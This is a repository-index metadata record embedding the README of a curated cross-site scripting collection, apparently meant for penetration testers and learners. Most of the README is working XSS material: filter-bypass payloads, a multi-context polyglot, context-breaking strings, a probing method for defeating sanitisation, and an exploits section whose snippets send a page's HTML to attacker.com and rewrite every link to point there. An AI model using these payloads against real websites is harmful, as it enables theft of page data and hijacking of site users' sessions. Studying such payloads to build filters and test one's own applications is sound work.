{"id":22560018,"url":"https://github.com/paulveillard/cybersecurity-cross-site-scripting","last_synced_at":"2026-02-26T01:55:12.858Z","repository":{"id":109657522,"uuid":"454603690","full_name":"paulveillard/cybersecurity-cross-site-scripting","owner":"paulveillard","description":"An ongoing curated collection of awesome XSS software, libraries, frameworks, learning tutorials \u0026 practical resources cross-site scripting.","archived":false,"fork":false,"pushed_at":"2022-02-02T01:15:29.000Z","size":53,"stargazers_count":9,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-10-19T12:49:48.201Z","etag":null,"topics":["cross-site-scripting","penetration-testing-tools","vulnerability-assessment","vulnerability-detection","vulnerability-identification","vulnerability-scanners","xss","xss-attacks","xss-detection","xss-exploitation","xss-filter","xss-injection","xss-payloads","xss-poc","xss-scanner","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/paulveillard.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":"code-of-conduct.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"security-write-ups-and-POCs.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-02T01:00:02.000Z","updated_at":"2025-08-19T09:47:52.000Z","dependencies_parsed_at":"2023-05-09T17:45:21.758Z","dependency_job_id":null,"html_url":"https://github.com/paulveillard/cybersecurity-cross-site-scripting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/paulve
illard/cybersecurity-cross-site-scripting","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/paulveillard","download_url":"https://codeload.github.com/paulveillard/cybersecurity-cross-site-scripting/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-cross-site-scripting/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29848629,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-25T22:37:40.667Z","status":"ssl_error","status_checked_at":"2026-02-25T22:37:25.960Z","response_time":61,"last_error":"SSL_read: unexpected eof while 
reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cross-site-scripting","penetration-testing-tools","vulnerability-assessment","vulnerability-detection","vulnerability-identification","vulnerability-scanners","xss","xss-attacks","xss-detection","xss-exploitation","xss-filter","xss-injection","xss-payloads","xss-poc","xss-scanner","xss-vulnerability"],"created_at":"2024-12-07T21:10:32.838Z","updated_at":"2026-02-26T01:55:12.830Z","avatar_url":"https://github.com/paulveillard.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Cross-Site Scripting\n\n\n\u003e An ongoing curated collection of awesome XSS software, libraries, frameworks, learning tutorials \u0026 practical resources cross-site scripting.\n\u003e Thanks to all contributors, you're awesome and wouldn't be possible without you! Our goal is to build a categorized community-driven collection of very well-known resources.\n\n## What is Cross-site Scripting?\nCross-site Scripting (XSS) is a client-side code injection attack. [Cross-site scripting](https://portswigger.net/web-security/cross-site-scripting) (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. 
\n\n## Table of contents\n\n### XSS contents\n- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)\n- [Reads \u0026 Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)\n- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)\n- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)\n- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)\n- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)\n- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)\n- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)\n- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)\n    - [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)\n    - [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)\n    - [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)\n- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)\n- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)\n- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)\n- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)\n- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)\n- [Tips \u0026 tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)\n\n### XSS Challenges\n- [prompt.ml](https://prompt.ml)\n- [alf.nu/alert1](https://alf.nu/alert1)\n- [s-p-o-o-k-y.com](https://www.s-p-o-o-k-y.com)\n- [xss-game.appspot.com](https://xss-game.appspot.com)\n- [polyglot.innerht.ml](https://polyglot.innerht.ml)\n- [sudo.co.il/xss](http://sudo.co.il/xss)\n- [hack.me/t/XSS](https://hack.me/t/XSS)\n- [root-me.org](https://www.root-me.org/?page=recherche\u0026lang=en\u0026recherche=xss)\n- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)\n- [wechall.net](https://www.wechall.net/challs/XSS)\n- 
[codelatte.net/xss](https://codelatte.net/xss/)\n\n### XSS Reads \u0026 Presentations\n- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)\n- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)\n- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)\n- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)\n- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)\n- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)\n- [Copy Pest](https://www.slideshare.net/x00mario/copypest)\n\n### XSS Tools\n- [XSStrike](https://github.com/UltimateHackers/XSStrike)\n- [xsshunter.com](https://xsshunter.com)\n- [BeEF](https://github.com/beefproject/beef)\n- [JShell](https://github.com/UltimateHackers/JShell)\n\n### XSS Mind Maps\nA beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)\n\n### DOM XSS\n\n- Does your input go into a sink? `Vulnerable`\n- It doesn't? `Not vulnerable`\n\n**Source**: An input that could be controlled by an external (untrusted) source.\n\n```\ndocument.URL\ndocument.documentURI\ndocument.URLUnencoded (IE 5.5 or later Only)\ndocument.baseURI\nlocation\nlocation.href\nlocation.search\nlocation.hash\nlocation.pathname\ndocument.cookie\ndocument.referrer\nwindow.name\nhistory.pushState()\nhistory.replaceState()\nlocalStorage\nsessionStorage\n```\n\n**Sink**: A potentially dangerous method that could lead to a vulnerability. 
In this case a DOM Based XSS.\n\n```\neval\nFunction\nsetTimeout\nsetInterval\nsetImmediate\nexecScript\ncrypto.generateCRMFRequest\nScriptElement.src\nScriptElement.text\nScriptElement.textContent\nScriptElement.innerText\nanyTag.onEventName\ndocument.write\ndocument.writeln\nanyElement.innerHTML\nRange.createContextualFragment\nwindow.location\ndocument.location\n```\n\nThis comprehensive list of sinks and source is taken from [domxsswiki](https://github.com/wisec/domxsswiki).\n\n### Awesome Payloads\n```\n\u003cA/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\"\u003ez\n\u003cd3\"\u003c\"/onclick=\"1\u003e[confirm``]\"\u003c\"\u003ez\n\u003cd3/onmouseenter=[2].find(confirm)\u003ez\n\u003cdetails open ontoggle=confirm()\u003e\n\u003cscript y=\"\u003e\u003c\"\u003e/*\u003cscript* */prompt()\u003c/script\n\u003cw=\"/x=\"y\u003e\"/ondblclick=`\u003c`[confir\\u006d``]\u003ez\n\u003ca href=\"javascript%26colon;alert(1)\"\u003eclick\n\u003ca href=javas\u0026#99;ript:alert(1)\u003eclick\n\u003cscript/\"\u003ca\"/src=data:=\".\u003ca,[8].some(confirm)\u003e\n\u003csvg/x=\"\u003e\"/onload=confirm()//\n\u003c--`\u003cimg/src=` onerror=confirm``\u003e --!\u003e\n\u003csvg%0Aonload=%09((pro\\u006dpt))()//\n\u003csCript x\u003e(((confirm)))``\u003c/scRipt x\u003e\n\u003csvg \u003c/onload =\"1\u003e (_=prompt,_(1)) \"\"\u003e\n\u003c!--\u003e\u003cscript src=//14.rs\u003e\n\u003cembed src=//14.rs\u003e\n\u003cscript x=\"\u003e\" src=//15.rs\u003e\u003c/script\u003e\n\u003c!'/*\"/*/'/*/\"/*--\u003e\u003c/Script\u003e\u003cImage SrcSet=K */; OnError=confirm`1` //\u003e\n\u003ciframe/src \\/\\/onload = prompt(1)\n\u003cx oncut=alert()\u003ex\n\u003csvg onload=write()\u003e\n```\n\n### Awesome Polyglots\n\nHere's an XSS polyglot that I made which can break out of 20+ contexts:\n```\n%0ajavascript:`/*\\\"/*--\u003e\u0026lt;svg onload='/*\u003c/template\u003e\u003c/noembed\u003e\u003c/noscript\u003e\u003c/style\u003e\u003c/title\u003e\u003c/textarea\u003e\u003c/script\u003e\u003chtml 
onmouseover=\"/**/ alert()//'\"\u003e`\n```\n\nExplanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)\n\n### XSS Tags \u0026 Event Handlers\n- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)\n- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)\n\nSome less detected event handlers\n```\nontoggle\nonauxclick\nondblclick\noncontextmenu\nonmouseleave\nontouchcancel\n```\n\nSome HTML Tags that you will be using\n```\nimg\nsvg\nbody\nhtml\nembed\nscript\nobject\ndetails\nisindex\niframe\naudio\nvideo\n```\n\n### Awesome Context Breaking\n\n#### HTML Context\nCase: `\u003ctag\u003eYou searched for $input. \u003c/tag\u003e`\n\n```\n\u003csvg onload=alert()\u003e\n\u003c/tag\u003e\u003csvg onload=alert()\u003e\n```\n\n#### Attribute Context\n\nCase: `\u003ctag attribute=\"$input\"\u003e`\n\n```\n\"\u003e\u003csvg onload=alert()\u003e\n\"\u003e\u003csvg onload=alert()\u003e\u003cb attr=\"\n\" onmouseover=alert() \"\n\"onmouseover=alert()//\n\"autofocus/onfocus=\"alert()\n```\n#### JavaScript Context\n\nCase: `\u003cscript\u003e var new something = '$input'; \u003c/script\u003e`\n\n```\n'-alert()-'\n'-alert()//'\n'}alert(1);{'\n'}%0Aalert(1);%0A{'\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\n\n### Awesome Confirm Variants\nYep, confirm because alert is too mainstream.\n```\nconfirm()\nconfirm``\n(confirm``)\n{confirm``}\n[confirm``]\n(((confirm)))``\nco\\u006efirm()\nnew class extends confirm``{}\n[8].find(confirm)\n[8].map(confirm)\n[8].some(confirm)\n[8].every(confirm)\n[8].filter(confirm)\n[8].findIndex(confirm)\n```\n\n### Awesome Exploits\n##### Replace all links\n```javascript\nArray.from(document.getElementsByTagName(\"a\")).forEach(function(i) {\n  i.href = \"https://attacker.com\";\n});\n```\n##### Source Code Stealer\n```html\n\u003csvg/onload=\"(new 
Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML\"\u003e\n```\nA good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)\n\n### Awesome Probing\nIf none of this works, take a look at the **Awesome Bypassing** section\n\nFirst of all, enter a non-malicious string like **d3v** and look at the source code to get an idea of the number and contexts of the reflections.\n\u003cbr\u003eNow for attribute context, check if double quotes (\") are being filtered by entering `x\"d3v`. If it gets altered to `x\u0026quot;d3v`, chances are that the output is being properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`. If it gets altered to `x\u0026apos;d3v`, you are doomed. The only thing you can try is encoding.\u003cbr\u003e\nIf the quotes are not being filtered, you can simply try the payloads from the **Awesome Context Breaking** section.\n\u003cbr\u003eFor JavaScript context, check which quotes are being used, for example whether they are doing\n```\nvariable = 'value' or variable = \"value\"\n```\nNow let's say single quotes (') are in use; in that case enter `x'd3v`. If it gets altered to `x\\'d3v`, try escaping the backslash (\\) by adding a backslash to your probe i.e. `x\\'d3v`. If it works, use the following payload:\n```\n\\'-alert()//\n```\nBut if it gets altered to `x\\\\\\'d3v`, the only thing you can try is closing the script tag itself by using\n```\n\u003c/script\u003e\u003csvg onload=alert()\u003e\n```\nFor simple HTML context, the probe is `x\u003cd3v`. If it gets altered to `x\u0026lt;d3v`, proper sanitization is in place. If it gets reflected as it is, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x\u003cxxx\u003e`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `\u003c` and `\u003e`. 
It can simply be bypassed using\n```\n\u003csvg onload=alert()//\n```\nor this (it will not work in all cases)\n```\n\u003csvg onload=alert()\n```\nIf your dummy tag lands in the source code as it is, go for any of these payloads\n```\n\u003csvg onload=alert()\u003e\n\u003cembed src=//14.rs\u003e\n\u003cdetails open ontoggle=alert()\u003e\n```\n\n### Awesome Bypassing\n\n**Note:** None of these payloads use single (') or double quotes (\").\n\n- Without event handlers\n```\n\u003cobject data=javascript:confirm()\u003e\n\u003ca href=javascript:confirm()\u003eclick here\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without space\n```\n\u003csvg/onload=confirm()\u003e\n\u003ciframe/src=javascript:alert(1)\u003e\n```\n- Without slash (/)\n```\n\u003csvg onload=confirm()\u003e\n\u003cimg src=x onerror=confirm()\u003e\n```\n- Without equal sign (=)\n```\n\u003cscript\u003econfirm()\u003c/script\u003e\n```\n- Without closing angle bracket (\u003e)\n```\n\u003csvg onload=confirm()//\n```\n- Without alert, confirm, prompt\n```\n\u003cscript src=//14.rs\u003e\u003c/script\u003e\n\u003csvg onload=co\\u006efirm()\u003e\n\u003csvg onload=z=co\\u006efir\\u006d,z()\u003e\n```\n- Without a Valid HTML tag\n```\n\u003cx onclick=confirm()\u003eclick here\n\u003cx ondrag=aconfirm()\u003edrag it\n```\n\n- Bypass tag blacklisting\n```\n\u003c/ScRipT\u003e\n\u003c/script\n\u003c/script/\u003e\n\u003c/script x\u003e\n```\n\n### Awesome Encoding\n\n|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|\n|----|----|-------|-----------|----|--------|----------|---|\n|`\u0026quot;`|\"|`\u0026#34;`|quotation mark|u+0022|\\0022|\\42|%22|\n|`\u0026num;`|#|`\u0026#35;`|number sign|u+0023|\\0023|\\43|%23|\n|`\u0026dollar;`|$|`\u0026#36;`|dollar sign|u+0024|\\0024|\\44|%24|\n|`\u0026percnt;`|%|`\u0026#37;`|percent 
sign|u+0025|\\0025|\\45|%25|\n|`\u0026amp;`|`\u0026|`\u0026#38;`|ampersand|u+0026|\\0026|\\46|%26|\n|`\u0026apos;`|'|`\u0026#39;`|apostrophe|u+0027|\\0027|\\47|%27|\n|`\u0026lpar;`|(|`\u0026#40;`|left parenthesis|u+0028|\\0028|\\50|%28|\n|`\u0026rpar;`|)|`\u0026#41;`|right parenthesis|u+0029|\\0029|\\51|%29|\n|`\u0026ast;`|*|`\u0026#42;`|asterisk|u+002A|\\002a|\\52|%2A|\n|`\u0026plus;`|+|`\u0026#43;`|plus sign|u+002B|\\002b|\\53|%2B|\n|`\u0026comma;`|,|`\u0026#44;`|comma|u+002C|\\002c|\\54|%2C|\n|`\u0026minus;`|-|`\u0026#45;`|hyphen-minus|u+002D|\\002d|\\55|%2D|\n|`\u0026period;`|.|`\u0026#46;`|full stop; period|u+002E|\\002e|\\56|%2E|\n|`\u0026sol;`|/|`\u0026#47;`|solidus; slash|u+002F|\\002f|\\57|%2F|\n|`\u0026colon;`|:|`\u0026#58;`|colon|u+003A|\\003a|\\72|%3A|\n|`\u0026semi;`|;`|`\u0026#59;`|semicolon|u+003B|\\003b|\\73|%3B|\n|`\u0026lt;`|\u003c|`\u0026#60;`|less-than|u+003C|\\003c|\\74|%3C|\n|`\u0026equals;`|=|`\u0026#61;`|equals|u+003D|\\003d|\\75|%3D|\n|`\u0026gt;`|\u003e|`\u0026#62;`|greater-than sign|u+003E|\\003e|\\76|%3E|\n|`\u0026quest;`|?|`\u0026#63;`|question mark|u+003F|\\003f|\\77|%3F|\n|`\u0026commat;`|@|`\u0026#64;`|at sign; commercial at|u+0040|\\0040|\\100|%40|\n|`\u0026lsqb;`|\\[|`\u0026#91;`|left square bracket|u+005B|\\005b|\\133|%5B|\n|`\u0026bsol;`|/|`\u0026#92;`|backslash|u+005C|\\005c|\\134|%5C|\n|`\u0026rsqb;`|]|`\u0026#93;`|right square bracket|u+005D|\\005d|\\135|%5D|\n|`\u0026Hat;`|^|`\u0026#94;`|circumflex accent|u+005E|\\005e|\\136|%5E|\n|`\u0026lowbar;`|_|`\u0026#95;`|low line|u+005F|\\005f|\\137|%5F|\n|`\u0026grave;`|\\`|`\u0026#96;`|grave accent|u+0060|\\0060|\\u0060|%60|\n|`\u0026lcub;`|{|`\u0026#123;`|left curly bracket|u+007b|\\007b|\\173|%7b|\n|`\u0026verbar;`|\\||`\u0026#124;`|vertical bar|u+007c|\\007c|\\174|%7c|\n|`\u0026rcub;`|}|`\u0026#125;`|right curly bracket|u+007d|\\007d|\\175|%7d|\n\n### Awesome Tips \u0026 Tricks\n- `http(s)://` can be shortened to `//` or `/\\\\` or `\\\\`.\n- `document.cookie` can be shortened to 
`cookie`. It applies to other DOM objects as well.\n- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`\n- You can use `//` to close a tag instead of `\u003e`.\n- I have found that `confirm` is the least detected pop-up function so stop using `alert`.\n- Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `\u003cscript src=//14.rs\u003e` instead of `\u003cscript src=\"//14.rs\"\u003e`\n- The shortest HTML context XSS payload is `\u003cscript src=//14.rs\u003e` (19 chars)\n\n\n\n\n**[`^        back to top        ^`](#)**\n\n## License\nMIT License \u0026 [cc](https://creativecommons.org/licenses/by/4.0/) license\n\n\u003ca rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"\u003e\u003cimg alt=\"Creative Commons License\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by/4.0/88x31.png\" /\u003e\u003c/a\u003e\u003cbr /\u003eThis work is licensed under a \u003ca rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"\u003eCreative Commons Attribution 4.0 International License\u003c/a\u003e.\n\nTo the extent possible under law, [Paul Veillard](https://github.com/paulveillard/) has waived all copyright and related or neighboring rights to this work.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-cross-site-scripting/lists"}